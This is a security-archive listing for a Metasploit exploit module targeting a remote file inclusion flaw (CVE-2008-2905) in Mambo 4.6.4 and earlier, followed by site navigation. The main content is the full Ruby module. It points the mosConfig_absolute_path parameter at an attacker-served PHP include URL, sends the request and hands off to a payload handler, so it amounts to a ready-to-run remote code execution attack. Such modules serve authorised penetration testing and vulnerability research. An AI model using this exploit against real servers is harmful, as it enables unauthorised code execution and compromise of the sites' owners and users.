Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion: Posted Oct 30, 2009; Authored by MC; This Metasploit module exploits a remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier.; tags | exploit, remote, php, file inclusion; advisories | CVE-2008-2905; MD5 | 22e651699eccbe7326a64912218e25e4; Download | Favorite | Comments (0)

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude

  def initialize(info = {})
    super(update_info(info,  
      'Name'           => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.',
      'Description'    => %q{
          This module exploits a remote file inclusion vulnerability in
          includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 
          4.6.4 and earlier.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'CVE', '2008-2905' ],
          [ 'BID', '29716' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      => 
            {
              'ConnectionType' => 'find',
            },
          'Space'       => 32768,
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Jun 14 2008',
      'DefaultTarget' => 0))
      
      register_options(
        [
          OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),
        ], self.class)
  end

  def php_exploit

    timeout = 0.01
    uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
    print_status("Trying uri #{uri}")

    response = send_request_raw( {
        'global' => true,
        'uri' => uri,
      },timeout)

    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end
    
    handler
  end

end

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
Am!r 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

Share This

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems